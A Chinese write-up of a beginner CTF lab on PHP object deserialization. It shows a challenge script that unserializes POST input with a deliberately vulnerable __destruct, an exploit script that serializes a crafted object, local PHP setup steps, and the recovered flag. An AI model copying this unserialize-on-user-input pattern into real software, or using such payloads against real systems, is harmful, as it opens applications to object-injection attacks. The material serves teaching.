PHP反序列化的CTF题目环境和做题复现第1集
1 通过post参数提交反序列信息
2 题目
http://192.168.1.8/fxl1/fxl1.php
<?php
highlight_file(__FILE__);class ezUnserialize{public $key;public function __destruct(){if($this->key == "FLAG"){include('flag.php');echo $flag;}}
}
unserialize($_POST['a']);
?>
3 EXP
<?php
<?php
class ezUnserialize{public $key;public function __construct($a){$this->key = $a;}
}
$obj = new ezUnserialize("FLAG");
echo serialize($obj);
?>
4 解题过程
4.0.1 在wsl的ubuntu上安装php环境
Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:# Disable old PHP module (if any)
sudo a2dismod php7.0 # or whatever version you had before# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache24.0.2 /var/www/html配置普通账户可读可写可执行权限
(base) gpu3090@DESKTOP-8IU6393:~$ chown gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成 anaconda3 cookies.txt downloads snap summaries tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$
4.0.3 将题目代码和flag存放到/var/www/html/相应的位置
4.1 在vscode上运行上面的exp的php脚本
需要安装插件php debug 和php Server
4.2 vscode运行exp 的php脚本
4.3 通过hackbar的post功能提交
4.得到flag
flag{EzUns3ri4liZe_1s_g00d}